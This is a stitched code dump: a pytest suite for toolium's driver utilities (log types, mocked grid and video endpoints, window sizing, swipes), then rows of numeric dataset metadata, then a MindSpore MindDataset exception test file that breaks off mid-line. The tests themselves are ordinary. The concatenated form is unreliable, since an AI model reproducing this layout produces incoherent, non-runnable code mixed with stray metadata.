from toolium.config_files import ConfigFiles
from toolium.driver_wrapper import DriverWrapper
from toolium.driver_wrappers_pool import DriverWrappersPool
from toolium.pageelements.page_element import PageElement
from toolium.utils.driver_utils import Utils
navigation_bar_tests = (
('android', 'C:/Demo.apk', None, 0),
('android', None, 'chrome', 0),
('ios', '/tmp/Demo.zip', None, 0),
('ios', None, 'safari', 64),
('firefox', None, None, 0),
)
driver_name_tests = (
('firefox', 'firefox'),
('chrome', 'chrome'),
('iexplore-11', 'iexplore'),
('iexplore-11-on-WIN10', 'iexplore'),
)
def get_mock_element(x, y, height, width):
"""Create a mock element with custom location and size
:param x: x location
:param y: y location
:param height: element height
:param width: element width
:returns: mock element
"""
mock_element = mock.MagicMock(spec=WebElement)
mock_element.location = {'x': x, 'y': y}
mock_element.size = {'height': height, 'width': width}
return mock_element
@pytest.yield_fixture
def driver_wrapper():
# Reset wrappers pool values
DriverWrappersPool._empty_pool()
DriverWrapper.config_properties_filenames = None
# Create a new wrapper
driver_wrapper = DriverWrappersPool.get_default_wrapper()
driver_wrapper.driver = mock.MagicMock()
# Configure properties
root_path = os.path.dirname(os.path.realpath(__file__))
config_files = ConfigFiles()
config_files.set_config_directory(os.path.join(root_path, 'conf'))
config_files.set_config_properties_filenames('properties.cfg')
config_files.set_output_directory(os.path.join(root_path, 'output'))
driver_wrapper.configure(config_files)
yield driver_wrapper
# Reset wrappers pool values
DriverWrappersPool._empty_pool()
DriverWrapper.config_properties_filenames = None
@pytest.fixture
def utils():
# Create a new Utils instance
return Utils()
@pytest.mark.parametrize("driver_type, driver_name", driver_name_tests)
def test_get_driver_name(driver_type, driver_name, driver_wrapper, utils):
driver_wrapper.config.set('Driver', 'type', driver_type)
assert utils.get_driver_name() == driver_name
def test_get_available_log_types_one_log_type(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', 'client')
log_types = utils.get_available_log_types()
log_types_mock.assert_not_called()
assert log_types == ['client']
def test_get_available_log_types_multiple_log_types(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', 'client,server,browser')
log_types = utils.get_available_log_types()
log_types_mock.assert_not_called()
assert log_types == ['client', 'server', 'browser']
def test_get_available_log_types_multiple_log_types_with_spaces(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', 'client, server , browser')
log_types = utils.get_available_log_types()
log_types_mock.assert_not_called()
assert log_types == ['client', 'server', 'browser']
def test_get_available_log_types_none_log_type(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', '')
log_types = utils.get_available_log_types()
log_types_mock.assert_not_called()
assert log_types == []
def test_get_available_log_types_all_log_type(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', 'all')
log_types = utils.get_available_log_types()
log_types_mock.assert_called_once_with()
assert log_types == ['client', 'server']
def test_get_available_log_types_without_log_types(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
log_types = utils.get_available_log_types()
log_types_mock.assert_called_once_with()
assert log_types == ['client', 'server']
def test_save_webdriver_logs_all_log_type(utils):
# Configure mock
Utils.save_webdriver_logs_by_type = mock.MagicMock()
Utils.get_available_log_types = mock.MagicMock(return_value=['client', 'server'])
utils.save_webdriver_logs('test_name')
Utils.save_webdriver_logs_by_type.assert_has_calls([mock.call('client', 'test_name'),
mock.call('server', 'test_name')])
def test_save_webdriver_logs_without_log_types(utils):
# Configure mock
Utils.save_webdriver_logs_by_type = mock.MagicMock()
Utils.get_available_log_types = mock.MagicMock(return_value=[])
utils.save_webdriver_logs('test_name')
Utils.save_webdriver_logs_by_type.assert_not_called()
def test_get_remote_node(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
grid_response_json = {'session': 'e2', 'proxyId': 'http://10.20.30.40:5555', 'msg': 'slot found !',
'inactivityTime': 78, 'success': True, 'internalKey': '7a'}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=grid_response_json)
# Get remote node and check result
assert utils.get_remote_node() == ('grid', '10.20.30.40')
assert url == req_mock.request_history[0].url
def test_get_remote_node_selenium3(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
grid_response_json = {'session': 'e2', 'proxyId': '10.20.30.40', 'msg': 'slot found !',
'inactivityTime': 78, 'success': True, 'internalKey': '7a'}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=grid_response_json)
# Get remote node and check result
assert utils.get_remote_node() == ('grid', '10.20.30.40')
assert url == req_mock.request_history[0].url
def test_get_remote_node_ggr(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
grid_url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
ggr_url = 'http://{}:{}/host/{}'.format('localhost', 4444, '5af')
ggr_response_json = {'Count': 3, 'Username': '', 'Scheme': '', 'VNC': '', 'Name': 'host_name', 'Password': '',
'Port': 4500}
with requests_mock.mock() as req_mock:
req_mock.get(grid_url, text='non_json_response')
req_mock.get(ggr_url, json=ggr_response_json)
# Get remote node and check result
assert utils.get_remote_node() == ('ggr', 'host_name')
assert grid_url == req_mock.request_history[0].url
assert ggr_url == req_mock.request_history[1].url
def test_get_remote_node_selenoid(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
grid_url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
ggr_url = 'http://{}:{}/host/{}'.format('localhost', 4444, '5af')
selenoid_url = 'http://{}:{}/status'.format('localhost', 4444)
selenoid_response_json = {'total': 5, 'used': 0, 'queued': 0, 'pending': 0, 'browsers': {'firefox': {'59.0': {}}}}
with requests_mock.mock() as req_mock:
req_mock.get(grid_url, text='non_json_response')
req_mock.get(ggr_url, json={})
req_mock.get(selenoid_url, json=selenoid_response_json)
# Get remote node and check result
assert utils.get_remote_node() == ('selenoid', 'localhost')
assert grid_url == req_mock.request_history[0].url
assert ggr_url == req_mock.request_history[1].url
assert selenoid_url == req_mock.request_history[2].url
def test_get_remote_node_non_grid(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
grid_url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
ggr_url = 'http://{}:{}/host/{}'.format('localhost', 4444, '5af')
selenoid_url = 'http://{}:{}/status'.format('localhost', 4444)
with requests_mock.mock() as req_mock:
req_mock.get(grid_url, text='non_json_response')
req_mock.get(ggr_url, json={})
req_mock.get(selenoid_url, json={})
# Get remote node and check result
assert utils.get_remote_node() == ('selenium', 'localhost')
assert grid_url == req_mock.request_history[0].url
assert ggr_url == req_mock.request_history[1].url
assert selenoid_url == req_mock.request_history[2].url
def test_get_remote_node_local_execution(driver_wrapper, utils):
driver_wrapper.config.set('Server', 'enabled', 'false')
assert utils.get_remote_node() == ('local', None)
def test_get_remote_video_url(utils):
# Configure mock
url = 'http://{}:{}/video'.format('10.20.30.40', 3000)
video_url = 'http://{}:{}/download_video/f4.mp4'.format('10.20.30.40', 3000)
video_response_json = {'exit_code': 1, 'out': [],
'error': ['Cannot call this endpoint without required parameters: session and action'],
'available_videos': {'5af': {'size': 489701,
'session': '5af',
'last_modified': 1460041262558,
'download_url': video_url,
'absolute_path': 'C:\\f4.mp4'}},
'current_videos': []}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=video_response_json)
# Get remote video url and check result
assert utils._get_remote_video_url('10.20.30.40', '5af') == video_url
assert url == req_mock.request_history[0].url
def test_get_remote_video_url_no_videos(utils):
# Configure mock
url = 'http://{}:{}/video'.format('10.20.30.40', 3000)
video_response_json = {'exit_code': 1, 'out': [],
'error': ['Cannot call this endpoint without required parameters: session and action'],
'available_videos': {},
'current_videos': []}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=video_response_json)
# Get remote video url and check result
assert utils._get_remote_video_url('10.20.30.40', '5af') is None
assert url == req_mock.request_history[0].url
def test_is_remote_video_enabled(utils):
# Configure mock
url = 'http://{}:{}/config'.format('10.20.30.40', 3000)
config_response_json = {'out': [], 'error': [], 'exit_code': 0,
'filename': ['selenium_grid_extras_config.json'],
'config_runtime': {'theConfigMap': {
'video_recording_options': {'width': '1024', 'videos_to_keep': '5',
'frames': '30',
'record_test_videos': 'true'}}}}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=config_response_json)
# Get remote video configuration and check result
assert utils.is_remote_video_enabled('10.20.30.40') is True
assert url == req_mock.request_history[0].url
def test_is_remote_video_enabled_disabled(utils):
# Configure mock
url = 'http://{}:{}/config'.format('10.20.30.40', 3000)
config_response_json = {'out': [], 'error': [], 'exit_code': 0,
'filename': ['selenium_grid_extras_config.json'],
'config_runtime': {'theConfigMap': {
'video_recording_options': {'width': '1024', 'videos_to_keep': '5',
'frames': '30',
'record_test_videos': 'false'}}}}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=config_response_json)
# Get remote video configuration and check result
assert utils.is_remote_video_enabled('10.20.30.40') is False
assert url == req_mock.request_history[0].url
@mock.patch('toolium.utils.driver_utils.requests.get')
def test_is_remote_video_enabled_non_grid_extras(req_get_mock, utils):
# Configure mock
req_get_mock.side_effect = ConnectionError('exception error')
# Get remote video configuration and check result
assert utils.is_remote_video_enabled('10.20.30.40') is False
@pytest.mark.parametrize("driver_type, appium_app, appium_browser_name, bar_height", navigation_bar_tests)
def test_get_safari_navigation_bar_height(driver_type, appium_app, appium_browser_name, bar_height, driver_wrapper,
utils):
driver_wrapper.config.set('Driver', 'type', driver_type)
if appium_app:
driver_wrapper.config.set('AppiumCapabilities', 'app', appium_app)
if appium_browser_name:
driver_wrapper.config.set('AppiumCapabilities', 'browserName', appium_browser_name)
assert utils.get_safari_navigation_bar_height() == bar_height
def test_get_window_size_android_native(driver_wrapper, utils):
# Configure driver mock
window_size = {'width': 375, 'height': 667}
driver_wrapper.driver.get_window_size.return_value = window_size
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'app', 'C:/Demo.apk')
assert utils.get_window_size() == window_size
driver_wrapper.driver.get_window_size.assert_called_once_with()
def test_get_window_size_android_native_two_times(driver_wrapper, utils):
# Configure driver mock
window_size = {'width': 375, 'height': 667}
driver_wrapper.driver.get_window_size.return_value = window_size
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'app', 'C:/Demo.apk')
assert utils.get_window_size() == window_size
assert utils.get_window_size() == window_size
# Check that window size is calculated only one time
driver_wrapper.driver.get_window_size.assert_called_once_with()
def test_get_window_size_android_web(driver_wrapper, utils):
# Configure driver mock
window_size = {'width': 375, 'height': 667}
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.driver.execute_script.side_effect = [window_size['width'], window_size['height']]
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'chrome')
assert utils.get_window_size() == window_size
driver_wrapper.driver.execute_script.assert_has_calls(
[mock.call('return window.innerWidth'), mock.call('return window.innerHeight')])
def test_get_window_size_android_web_two_times(driver_wrapper, utils):
# Configure driver mock
window_size = {'width': 375, 'height': 667}
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.driver.execute_script.side_effect = [window_size['width'], window_size['height']]
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'chrome')
assert utils.get_window_size() == window_size
assert utils.get_window_size() == window_size
# Check that window size is calculated only one time
driver_wrapper.driver.execute_script.assert_has_calls(
[mock.call('return window.innerWidth'), mock.call('return window.innerHeight')])
def test_get_native_coords_android_web(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.driver.execute_script.side_effect = [web_window_size['width'], web_window_size['height']]
driver_wrapper.driver.get_window_size.side_effect = [native_window_size]
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'chrome')
web_coords = {'x': 105, 'y': 185}
native_coords = {'x': 52.5, 'y': 92.5}
assert utils.get_native_coords(web_coords) == native_coords
def test_get_native_coords_ios_web(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.get_window_size.side_effect = [web_window_size, native_window_size]
driver_wrapper.config.set('Driver', 'type', 'ios')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'safari')
web_coords = {'x': 105, 'y': 185}
native_coords = {'x': 52.5, 'y': 156.5}
assert utils.get_native_coords(web_coords) == native_coords
def test_swipe_android_native(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.get_window_size.side_effect = [web_window_size, native_window_size]
driver_wrapper.driver.current_context = 'NATIVE_APP'
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'app', 'C:/Demo.apk')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
utils.swipe(element, 50, 100)
driver_wrapper.driver.swipe.assert_called_once_with(400, 60, 450, 160, None)
def test_swipe_android_web(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.driver.execute_script.side_effect = [web_window_size['width'], web_window_size['height']]
driver_wrapper.driver.get_window_size.side_effect = [native_window_size]
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'chrome')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
utils.swipe(element, 50, 100)
driver_wrapper.driver.swipe.assert_called_once_with(200, 30, 250, 130, None)
def test_swipe_android_hybrid(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
# driver_wrapper.utils
driver_wrapper.driver.get_window_size.side_effect = [web_window_size, native_window_size]
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'app', 'C:/Demo.apk')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
utils.swipe(element, 50, 100)
driver_wrapper.driver.swipe.assert_called_once_with(200, 30, 250, 130, None)
def test_swipe_ios_web(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.get_window_size.side_effect = [web_window_size, native_window_size]
driver_wrapper.config.set('Driver', 'type', 'ios')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'safari')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
utils.swipe(element, 50, 100)
driver_wrapper.driver.swipe.assert_called_once_with(200, 94, 50, 100, None)
def test_swipe_web(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.config.set('Driver', 'type', 'firefox')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
with pytest.raises(Exception) as excinfo:
utils.swipe(element, 50, 100)
assert 'Swipe method is not implemented in Selenium' == str(excinfo.value)
def test_get_web_element_from_web_element(utils):
element = WebElement(None, 1)
web_element = utils.get_web_element(element)
assert element == web_element
def test_get_web_element_from_page_element(driver_wrapper, utils):
# Mock Driver.save_web_element = True
driver_wrapper.config = mock.MagicMock()
driver_wrapper.config.getboolean_optional.return_value = True
element = PageElement(By.ID, 'element_id')
element._web_element = 'mock_element'
web_element = utils.get_web_element(element)
assert 'mock_element' == web_element
def test_get_web_element_from_locator(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = 'mock_element'
element_locator = (By.ID, 'element_id')
# Get element and assert response
web_element = utils.get_web_element(element_locator)
assert 'mock_element' == web_element
driver_wrapper.driver.find_element.assert_called_once_with(*element_locator)
def test_get_web_element_from_none(utils):
web_element = utils.get_web_element(None)
assert web_element is None
def test_get_web_element_from_unknown(utils):
web_element = utils.get_web_element(dict())
assert web_element is None
def test_wait_until_first_element_is_found_locator(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = 'mock_element'
element_locator = (By.ID, 'element_id')
element = utils.wait_until_first_element_is_found([element_locator])
assert element_locator == element
driver_wrapper.driver.find_element.assert_called_once_with(*element_locator)
@pytest.mark.usefixtures('driver_wrapper')
def test_wait_until_first_element_is_found_page_element(utils):
# Mock Driver.save_web_element = True
driver_wrapper.config = mock.MagicMock()
driver_wrapper.config.getboolean_optional.return_value = True
page_element = PageElement(By.ID, 'element_id')
page_element._web_element = 'mock_element'
element = utils.wait_until_first_element_is_found([page_element])
assert page_element == element
@pytest.mark.usefixtures('driver_wrapper')
def test_wait_until_first_element_is_found_none(utils):
# Mock Driver.save_web_element = True
driver_wrapper.config = mock.MagicMock()
driver_wrapper.config.getboolean_optional.return_value = True
page_element = PageElement(By.ID, 'element_id')
page_element._web_element = 'mock_element'
element = utils.wait_until_first_element_is_found([None, page_element])
assert page_element == element
def test_wait_until_first_element_is_found_timeout(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.driver.find_element.side_effect = NoSuchElementException('Unknown')
element_locator = (By.ID, 'element_id')
start_time = time.time()
with pytest.raises(TimeoutException) as excinfo:
utils.wait_until_first_element_is_found([element_locator])
end_time = time.time()
assert 'None of the page elements has been found after 10 seconds' in str(excinfo.value)
# find_element has been called more than one time
driver_wrapper.driver.find_element.assert_called_with(*element_locator)
# Execution time must be greater than timeout
assert end_time - start_time > 10
def test_wait_until_first_element_is_found_custom_timeout(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.driver.find_element.side_effect = NoSuchElementException('Unknown')
element_locator = (By.ID, 'element_id')
start_time = time.time()
with pytest.raises(TimeoutException) as excinfo:
utils.wait_until_first_element_is_found([element_locator], timeout=15)
end_time = time.time()
assert 'None of the page elements has been found after 15 seconds' in str(excinfo.value)
# find_element has been called more than one time
driver_wrapper.driver.find_element.assert_called_with(*element_locator)
# Execution time must be greater than timeout
assert end_time - start_time > 15
def test_utils_compatibility():
# Check that utils works with old import
from toolium.utils import Utils
old_import_utils = Utils()
assert hasattr(old_import_utils, 'get_web_element')
| 40.397535
| 118
| 0.700854
| 3,426
| 26,218
| 5.051956
| 0.102452
| 0.090883
| 0.050497
| 0.039404
| 0.819968
| 0.797492
| 0.770049
| 0.755662
| 0.736249
| 0.720649
| 0
| 0.02512
| 0.180067
| 26,218
| 648
| 119
| 40.459877
| 0.780016
| 0.095698
| 0
| 0.58794
| 0
| 0
| 0.155088
| 0.007202
| 0
| 0
| 0
| 0
| 0.188442
| 1
| 0.115578
| false
| 0.002513
| 0.042714
| 0.002513
| 0.163317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4c7a8e7078f044d03a01433ca5ff3c24b469be98
| 11,495
|
py
|
Python
|
tests/ut/python/dataset/test_minddataset_exception.py
|
Rossil2012/mindspore
|
8a20b5d784b3fec6d32e058581ec56ec553a06a0
|
[
"Apache-2.0"
] | 1
|
2021-04-23T06:35:18.000Z
|
2021-04-23T06:35:18.000Z
|
tests/ut/python/dataset/test_minddataset_exception.py
|
nudt-eddie/mindspore
|
55372b41fdfae6d2b88d7078971e06d537f6c558
|
[
"Apache-2.0"
] | null | null | null |
tests/ut/python/dataset/test_minddataset_exception.py
|
nudt-eddie/mindspore
|
55372b41fdfae6d2b88d7078971e06d537f6c558
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import pytest
import mindspore.dataset as ds
from mindspore.mindrecord import FileWriter
CV_FILE_NAME = "./imagenet.mindrecord"
CV1_FILE_NAME = "./imagenet1.mindrecord"
def create_cv_mindrecord(files_num):
"""tutorial for cv dataset writer."""
if os.path.exists(CV_FILE_NAME):
os.remove(CV_FILE_NAME)
if os.path.exists("{}.db".format(CV_FILE_NAME)):
os.remove("{}.db".format(CV_FILE_NAME))
writer = FileWriter(CV_FILE_NAME, files_num)
cv_schema_json = {"file_name": {"type": "string"}, "label": {"type": "int32"}, "data": {"type": "bytes"}}
data = [{"file_name": "001.jpg", "label": 43, "data": bytes('0xffsafdafda', encoding='utf-8')}]
writer.add_schema(cv_schema_json, "img_schema")
writer.add_index(["file_name", "label"])
writer.write_raw_data(data)
writer.commit()
def create_diff_schema_cv_mindrecord(files_num):
"""tutorial for cv dataset writer."""
if os.path.exists(CV1_FILE_NAME):
os.remove(CV1_FILE_NAME)
if os.path.exists("{}.db".format(CV1_FILE_NAME)):
os.remove("{}.db".format(CV1_FILE_NAME))
writer = FileWriter(CV1_FILE_NAME, files_num)
cv_schema_json = {"file_name_1": {"type": "string"}, "label": {"type": "int32"}, "data": {"type": "bytes"}}
data = [{"file_name_1": "001.jpg", "label": 43, "data": bytes('0xffsafdafda', encoding='utf-8')}]
writer.add_schema(cv_schema_json, "img_schema")
writer.add_index(["file_name_1", "label"])
writer.write_raw_data(data)
writer.commit()
def create_diff_page_size_cv_mindrecord(files_num):
"""tutorial for cv dataset writer."""
if os.path.exists(CV1_FILE_NAME):
os.remove(CV1_FILE_NAME)
if os.path.exists("{}.db".format(CV1_FILE_NAME)):
os.remove("{}.db".format(CV1_FILE_NAME))
writer = FileWriter(CV1_FILE_NAME, files_num)
writer.set_page_size(1 << 26) # 64MB
cv_schema_json = {"file_name": {"type": "string"}, "label": {"type": "int32"}, "data": {"type": "bytes"}}
data = [{"file_name": "001.jpg", "label": 43, "data": bytes('0xffsafdafda', encoding='utf-8')}]
writer.add_schema(cv_schema_json, "img_schema")
writer.add_index(["file_name", "label"])
writer.write_raw_data(data)
writer.commit()
def test_cv_lack_json():
"""tutorial for cv minderdataset."""
create_cv_mindrecord(1)
columns_list = ["data", "file_name", "label"]
num_readers = 4
with pytest.raises(Exception):
ds.MindDataset(CV_FILE_NAME, "no_exist.json", columns_list, num_readers)
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_cv_lack_mindrecord():
"""tutorial for cv minderdataset."""
columns_list = ["data", "file_name", "label"]
num_readers = 4
with pytest.raises(Exception, match="does not exist or permission denied"):
_ = ds.MindDataset("no_exist.mindrecord", columns_list, num_readers)
def test_invalid_mindrecord():
with open('dummy.mindrecord', 'w') as f:
f.write('just for test')
columns_list = ["data", "file_name", "label"]
num_readers = 4
with pytest.raises(Exception, match="MindRecordOp init failed"):
data_set = ds.MindDataset('dummy.mindrecord', columns_list, num_readers)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert num_iter == 0
except Exception as error:
os.remove('dummy.mindrecord')
raise error
else:
os.remove('dummy.mindrecord')
def test_minddataset_lack_db():
create_cv_mindrecord(1)
os.remove("{}.db".format(CV_FILE_NAME))
columns_list = ["data", "file_name", "label"]
num_readers = 4
with pytest.raises(Exception, match="MindRecordOp init failed"):
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert num_iter == 0
except Exception as error:
os.remove(CV_FILE_NAME)
raise error
else:
os.remove(CV_FILE_NAME)
def test_cv_minddataset_pk_sample_error_class_column():
create_cv_mindrecord(1)
columns_list = ["data", "file_name", "label"]
num_readers = 4
sampler = ds.PKSampler(5, None, True, 'no_exsit_column')
with pytest.raises(Exception, match="MindRecordOp launch failed"):
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, sampler=sampler)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_cv_minddataset_pk_sample_exclusive_shuffle():
create_cv_mindrecord(1)
columns_list = ["data", "file_name", "label"]
num_readers = 4
sampler = ds.PKSampler(2)
with pytest.raises(Exception, match="sampler and shuffle cannot be specified at the same time."):
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers,
sampler=sampler, shuffle=False)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_cv_minddataset_reader_different_schema():
create_cv_mindrecord(1)
create_diff_schema_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception, match="MindRecordOp init failed"):
data_set = ds.MindDataset([CV_FILE_NAME, CV1_FILE_NAME], columns_list,
num_readers)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
os.remove(CV1_FILE_NAME)
os.remove("{}.db".format(CV1_FILE_NAME))
def test_cv_minddataset_reader_different_page_size():
create_cv_mindrecord(1)
create_diff_page_size_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception, match="MindRecordOp init failed"):
data_set = ds.MindDataset([CV_FILE_NAME, CV1_FILE_NAME], columns_list,
num_readers)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
os.remove(CV1_FILE_NAME)
os.remove("{}.db".format(CV1_FILE_NAME))
def test_minddataset_invalidate_num_shards():
create_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception) as error_info:
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, True, 1, 2)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert 'Input shard_id is not within the required interval of (0 to 0).' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
else:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_minddataset_invalidate_shard_id():
create_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception) as error_info:
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, True, 1, -1)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert 'Input shard_id is not within the required interval of (0 to 0).' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
else:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_minddataset_shard_id_bigger_than_num_shard():
create_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception) as error_info:
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, True, 2, 2)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert 'Input shard_id is not within the required interval of (0 to 1).' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
with pytest.raises(Exception) as error_info:
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, True, 2, 5)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert 'Input shard_id is not within the required interval of (0 to 1).' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
else:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_cv_minddataset_partition_num_samples_equals_0():
"""tutorial for cv minddataset."""
create_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
def partitions(num_shards):
for partition_id in range(num_shards):
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers,
num_shards=num_shards,
shard_id=partition_id, num_samples=0)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
with pytest.raises(Exception) as error_info:
partitions(5)
try:
assert 'num_samples should be a positive integer value, but got num_samples=0' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
else:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
if __name__ == '__main__':
